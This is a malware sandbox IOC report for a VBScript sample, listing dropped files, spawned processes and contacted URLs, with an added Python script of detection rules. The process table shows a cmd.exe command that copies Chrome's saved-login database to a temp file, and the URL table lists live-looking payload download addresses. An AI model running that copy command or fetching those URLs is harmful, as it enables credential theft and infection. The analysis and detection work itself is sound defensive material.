IOC Report


Files

File Path | Type | Category | Malicious
MTIR22024323_0553381487_20220112120005.vbs | ASCII text, with CRLF line terminators | initial sample | malicious
C:\Users\user\AppData\Local\Temp\DB1 | SQLite 3.x database, last written using SQLite version 3032001 | dropped | malicious
C:\Users\user\AppData\Roaming\O118090C\O11logri.ini | data | dropped | malicious
C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini | data | dropped | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db | data | modified | clean
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped | clean
C:\Users\user\AppData\Local\Temp\FORSVARL.dat | data | dropped | clean
C:\Users\user\AppData\Local\Temp\RES5835.tmp | Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ti3icgl.ztk.psm1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10kgrqs.2gg.ps1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.0.cs | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.out | UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators | modified | clean
C:\Users\user\AppData\Roaming\O118090C\O11logim.jpeg | JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3 | dropped | clean
C:\Users\user\AppData\Roaming\O118090C\O11logrg.ini | data | dropped | clean
C:\Users\user\Documents\20220113\PowerShell_transcript.675052.bBuy1HxC.20220113145401.txt | UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators | dropped | clean

Processes

Path | Cmdline | Malicious
C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "… | malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe | malicious
C:\Windows\explorer.exe | C:\Windows\Explorer.EXE | malicious
C:\Windows\SysWOW64\cmstp.exe | C:\Windows\SysWOW64\cmstp.exe | malicious
C:\Windows\SysWOW64\cmd.exe | /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V | malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe | "C:\Program Files (x86)\internet explorer\ieinstal.exe" | malicious
C:\Program Files (x86)\Internet Explorer\ieinstal.exe | "C:\Program Files (x86)\internet explorer\ieinstal.exe" | malicious
C:\Windows\explorer.exe | "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS | malicious
C:\Windows\explorer.exe | "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | clean
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline | clean
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" | clean
C:\Windows\SysWOW64\autochk.exe | C:\Windows\SysWOW64\autochk.exe | clean
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | clean
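The Files and Processes tables above read as a chain: a script host runs the dropped .vbs, PowerShell is started with an encoded command, csc.exe compiles a response file out of %TEMP% (the artifacts Add-Type leaves behind), ieinstal.exe and cmstp.exe are started with no arguments, and cmd.exe copies Chrome's "Login Data" SQLite store to %TEMP%\DB1. The block below is an added triage example, not part of the sandbox report: it runs simple rules over the command lines and file entries copied from both tables and returns the rule names each one trips. The rule names, the regexes and the PowerShell switch-prefix handling are my own heuristics; the encoded PowerShell blob is a placeholder because the report omits it.

```python
"""Triage rules for the IOC tables above (added example, not part of the report).

Sample input is copied from the Files and Processes tables; rule names and
heuristics are my own choices, not a vendor's detection content.
"""
import re

# --- sample input copied from the Processes table (encoded blob omitted there) ---
PROCESSES = [
    r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"',
    r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "<blob removed in report>',
    r'C:\Program Files (x86)\internet explorer\ieinstal.exe',
    r'"C:\Program Files (x86)\internet explorer\ieinstal.exe"',
    r'C:\Windows\Explorer.EXE',
    r'C:\Windows\SysWOW64\cmstp.exe',
    r'/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V',
    r'"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS',
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline',
]

# --- sample input copied from the Files table: (path, file type) ---
FILES = [
    (r"C:\Users\user\AppData\Local\Temp\DB1", "SQLite 3.x database, last written using SQLite version 3032001"),
    (r"C:\Users\user\AppData\Roaming\O118090C\O11logri.ini", "data"),
    (r"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db", "data"),
    (r"C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v10kgrqs.2gg.ps1", "very short file (no magic)"),
    (r"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll", "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows"),
    (r"C:\Users\user\AppData\Roaming\O118090C\O11logim.jpeg", "JPEG image data"),
]


def _has(pattern, text):
    """Case-insensitive regex search, returned as a bool."""
    return re.search(pattern, text, re.I) is not None


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, -ec, ...),
# so match the whole prefix set instead of the spelled-out switch only.
ENCODED_SWITCHES = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}


def _switches(cmdline):
    """Lower-cased switch names: tokens that start with - or / at a token boundary."""
    return {s.lower() for s in re.findall(r"(?<!\S)[-/](\w+)", cmdline)}


def powershell_encoded_command(cmdline):
    """True when a powershell.exe command line carries an encoded-command switch."""
    return _has(r"powershell\.exe", cmdline) and bool(_switches(cmdline) & ENCODED_SWITCHES)


PROCESS_RULES = {
    # wscript/cscript running a user-dropped script file
    "script_host_runs_user_script": lambda c: _has(r"\\[wc]script\.exe\b.*\.(?:vbs|vbe|js|jse|wsf)\b", c),
    "powershell_encoded_command": powershell_encoded_command,
    # copy of Chrome's credential store (the cmd.exe line in the report)
    "browser_login_db_copied": lambda c: _has(r"\bcopy\b.*\\Login Data\b", c),
    # ieinstal.exe / cmstp.exe have no business running bare; both appear that way above
    "ieinstal_without_arguments": lambda c: _has(r'\\ieinstal\.exe"?\s*$', c),
    "cmstp_without_arguments": lambda c: _has(r'\\cmstp\.exe"?\s*$', c),
    # csc.exe fed a response file under %TEMP%: what PowerShell Add-Type produces
    "csc_compiles_from_temp": lambda c: _has(r'\\csc\.exe.*@"?[^"]*\\Temp\\', c),
}

FILE_RULES = {
    # a SQLite database sitting in %TEMP% matches the copied Login Data store
    "sqlite_db_in_temp": lambda p, t: t.startswith("SQLite") and _has(r"\\Temp\\", p),
    # an 8-character alphanumeric directory directly under Roaming (O118090C above)
    "random_dir_in_roaming": lambda p, t: re.search(r"\\AppData\\Roaming\\[A-Z0-9]{8}\\", p) is not None,
    # %TEMP%\<8 chars>\<same 8 chars>.* is the Add-Type compile layout (ej2xf2fu above)
    "addtype_compile_artifact": lambda p, t: _has(r"\\Temp\\([a-z0-9]{8})\\\1\.", p),
    # benign: PowerShell writes these to test the execution policy
    "powershell_policy_test_file": lambda p, t: "__PSScriptPolicyTest_" in p,
}


def triage_processes(cmdlines=PROCESSES):
    """Map each command line to the rule names it trips (empty list = nothing notable)."""
    return {c: [name for name, rule in PROCESS_RULES.items() if rule(c)] for c in cmdlines}


def triage_files(entries=FILES):
    """Map each file path to the rule names it trips."""
    return {p: [name for name, rule in FILE_RULES.items() if rule(p, t)] for p, t in entries}


if __name__ == "__main__":
    for table in (triage_processes(), triage_files()):
        for item, hits in table.items():
            if hits:
                print(f"{', '.join(hits):32} {item}")
```

Each rule is deliberately narrow and keyed to a token the report actually shows; the encoded-command rule is the only one with any generality, because defenders who match the literal string "-EncodedCommand" miss the equally valid `-enc` and `-ec` spellings. Parent/child relationships are not in the table, so the rules work on command lines alone; with process-tree data the ieinstal.exe rule would additionally check that its parent is not an Internet Explorer installer.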

URLs

Name | IP | Malicious
www.jewelrystore1.com/wk3t/ | | malicious
https://www.wizumiya.co.jp/html/user_da | | malicious
http://www.autoitscript.com/autoit3/J | unknown | clean
http://nuget.org/NuGet.exe | unknown | clean
http://pesterbdd.com/images/Pester.png | unknown | clean
https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at | unknown | clean
http://crl.microsoft | unknown | clean
http://www.apache.org/licenses/LICENSE-2.0.html | unknown | clean
https://contoso.com/ | unknown | clean
https://nuget.org/nuget.exe | unknown | clean
https://contoso.com/License | unknown | clean
https://contoso.com/Icon | unknown | clean
http://schemas.microsoft. | unknown | clean
http://fahrschule-heli.at/bin_WUOAiR166.bin | unknown | clean
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g | unknown | clean
https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin | 52.68.15.223 | clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | clean
https://github.com/Pester/Pester | unknown |